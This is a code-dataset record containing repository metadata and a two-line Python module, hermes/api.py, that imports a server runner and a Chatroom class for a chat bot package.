] | 11 | 2015-05-24T22:04:32.000Z | 2021-04-14T14:05:19.000Z | hermes/api.py | mattlong/hermes | 63a5afcafe90ca99aeb44edeee9ed6f90baae431 | [
"0BSD"
] | 1 | 2016-12-21T18:14:09.000Z | 2016-12-21T18:14:09.000Z | hermes/api.py | LaudateCorpus1/hermes-10 | 63a5afcafe90ca99aeb44edeee9ed6f90baae431 | [
"0BSD"
] | 4 | 2015-07-15T13:15:44.000Z | 2022-01-03T12:18:44.000Z | from hermes.server import run_server
from hermes.chatroom import Chatroom
| 24.666667 | 36 | 0.864865 | 11 | 74 | 5.727273 | 0.545455 | 0.31746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 74 | 2 | 37 | 37 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.